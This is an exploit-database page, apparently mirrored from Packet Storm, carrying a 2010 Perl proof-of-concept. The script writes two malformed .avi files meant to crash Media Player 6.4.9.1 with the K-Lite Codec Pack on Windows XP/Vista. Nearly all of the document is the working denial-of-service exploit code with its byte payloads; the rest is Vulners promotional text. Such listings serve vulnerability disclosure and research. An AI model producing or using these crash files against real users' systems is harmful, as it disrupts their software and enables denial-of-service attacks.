Lucene search
K

Media Player 6.4.9.1 Denial Of Service

🗓️ 16 Mar 2010 00:00:00Reported by Enigma7Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 16 Views

Media Player 6.4.9.1 K-Lite Codec Pack Do

Code
`# Exploit Title: Media Player V6.4.9.1 with K-Lite Codec Pack DoS/Crash (.avi file)  
# Date: 14/3/2010  
# Author: En|gma7  
# Software Link: http://www.free-codecs.com/K_lite_codec_pack_download.htm  
# Version: Media Player V6.4.9.1 with K-Lite Codec Pack 5.8.0  
# Tested on: WinXP/Vista  
# CVE : [if exists]  
# Code :  
  
#!/usr/bin/perl  
  
# dos.avi work on windows XP with all SP  
#crash.avi work on WinXP/Vista  
  
print "  
[~] Media Player V6.4.9.1 with K-Lite Codec Pack 5.8.0 DoS/Crash (.avi file)  
[~] EN|GMA7 Team ~  
[~] By Zaid  
[~] www.enigma7.net<http://www.enigma7.net><http://www.enigma7.net>  
";  
  
  
$bf = "\x4D\x54\x68\x64\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00";  
$crash = "\x4D\x54\x68\x64\x00\x00\x00\x06";  
  
open(file, "> dos.avi");  
print (file $bf);  
open(file, "> crash.avi");  
print (file $crash);  
print "\n\n[+] Done!\n  
[+] dos.avi and crash.avi created..\n  
[+] Z-at-Enigma7.net\n";  
  
  
  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

16 Mar 2010 00:00Current
0.2Low risk
Vulners AI Score0.2
16